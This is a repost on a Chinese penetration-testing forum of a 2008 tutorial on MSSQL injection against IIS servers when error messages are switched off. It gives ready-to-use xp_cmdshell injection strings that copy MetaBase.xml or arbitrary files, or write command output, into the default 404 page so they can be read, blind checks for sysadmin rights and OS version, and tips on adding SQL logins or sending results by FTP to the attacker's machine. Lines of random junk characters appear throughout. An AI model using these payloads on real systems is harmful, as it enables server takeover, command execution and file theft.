中国网络渗透测试联盟
标题:
28度的冰注入技巧之(一)——404页面的妙用
[打印本页]
作者:
admin
时间:
2012-9-15 14:15
标题:
28度的冰注入技巧之(一)——404页面的妙用
遇到一个sa注入点,mssql错误提示关闭无疑shi让人郁闷的事情。
/ S' {* O3 h2 c* e ^/ c
4 X9 N4 s: r; d+ ]' `2 V) ?# S
虽然错误提示关闭也shi可能以列目录,执行命令,但shishi多少就有些不方便。阿D就可能以在错误提示关闭的情况下列目录。
; e; n. T1 x1 Y7 s
; j2 {9 k! E9 U) f% u9 V6 a
这里有一个很好的方法,让你得到web目录路径,让你得到服务器上的文件,让你执行命令得到回显。
Y* S- F$ a! f W
. H+ a0 a# M! t s1 d
IIS,404页面的默认路径shi C:\Windows\Help\iisHelp\common\404b.htm
/ K4 m- |% F& y, [
# H! V6 n4 Q9 m
得到web路径exec master..xp_cmdshell ’copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm’--
# ]! {7 B6 r" d* j; j
p4 c: e: Q4 d6 L E; b0 U
,这shi20003,如果是2000的话,exec master..xp_cmdshell ’copy C:\Winnt\system32 \inetsrv\MetaBase.xml C:\Winnts\Help\iisHelp\common\404b.htm’--,在 MetaBase.xml存着IIS的很多信息。执行上面的语句之后,你再访问一下网站一个不存在的文件或目录,显示的就shiMetaBase.xml 的内容了。
) J/ u3 L! W5 C" G- \$ p
/ I2 ?: p$ B# \2 J) T
执行命令得到回显
6 x( ^/ H! o$ I
/ Y. ? V) y0 E5 O/ |* U- Z
通过上面得到web路径的方法,你肯定很容易想到怎么得到回显了吧。 2003,exec master..xp_cmdshell ’ver >C:\Windows\Help\iisHelp\common \404b.htm’--如果是2000,exec master..xp_cmdshell ’ver >C:\Winnt\Help \iisHelp\common\404b.htm’--
1 Z8 w% U# o5 q9 r# V
; X# @; X A% M" J
得到文件也shi相同,把文件copy到404b.htm就行了
5 T- C0 l9 _8 F1 B( G
! f6 P$ o& l6 p7 ~1 l7 }) |3 R2 O
by 28ice, 2008/6/26
& g, n/ U; S2 R& j. F; { u
7 f9 h" [& y! q8 z' R
摘自 28度的冰
) I$ s# l1 ?! \5 ^5 p
: `6 x8 o- I3 [ L4 B% \6 a O
盲注判断权限和操作系统版本
% [6 b& _9 R0 t* E: d8 i( g6 o
1 w! J( G, q" B0 ]% n5 B% n
首先第一个问题,如果错误提示关闭,怎么判断当前的权限shi否为sysadmin呢?
- k$ S1 Y: b. B; p6 l6 ^$ n# K
2 p$ U. {+ m/ O! M2 d4 y1 K8 ]
最简单的,可能以用这样的方法:
% {1 ?) N# b) e0 w) g
% s7 B' y; B) ]' M! g
1=(select IS_SRVROLEMEMBER(’sysadmin’))
u4 f( v9 P9 I# J" S6 V8 b$ s; l
, B+ ^+ l/ [7 ]% N
当然,有些情况下,这个方法并不奏效。
% l# |# E$ `$ \
0 @! C p& R/ L$ U
既然shisa,我们就可能以通过执行命令判断,不过,既然错误提示关闭,那么执行的结果就很不容易拿到。
. f" k2 b$ n( K3 C$ o
: k3 _ _" b9 e% [ U. {
有个3办法可能以解决这个问题
" P; ]3 M) K4 l$ ]; q
& `& p S% c: i* m
a.把执行结果写到404b.htm,具体请看我的上一篇文章
8 j; ~2 l, v. B, e
. {& t! Y0 t3 Y" y4 m8 c; R' t
b.执行ping 127.1 -n 10,看看页面shi否延迟10秒钟
# d( {* U. v. b" y: K2 D4 b
3 e$ k L2 ^% G& g% k1 c: g
c.如果1433端口可能以连接,那干脆新建个sql登录
: v/ x, p$ n# j3 j& z' e4 M
4 n& c7 W( r) z6 d
d.如果大牛你shi公网Ip,openrowset,或者直接telnet,ftp到你自己的机子,说到这里,ftp还有别的用处,比如,把执行结果写到文件中,然后通过ftp传到你的机子上,这何尝不shi获得执行结果的一个好办法。当然,你可能能要用到ftp的-s参数
, L! h" G$ G/ }( g$ u, s
+ |5 y. F. G% h0 T4 w6 `& X
还有一个问题,怎么判断系统shi2000还shi2003?当然指的shi错误提示关闭的情况下
. o8 f* e' ]5 A# W* `& C" v7 j
- Z9 I- F' X; N' \ u5 x: D6 ]$ S
很简单
' @: P2 k4 S( _/ n d' @
2 L) R2 v% E: ~; E/ r5 S- U5 S
执行systeminfo
/ A2 K$ l. I0 G
$ V j/ @9 \5 c/ t- o
在xp/2003下才有这个命令,这个命令执行大概需要5秒钟时间。如果页面延迟5秒,就可能以进一步断定这shi2003(当然不排除2008的可能能性)。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2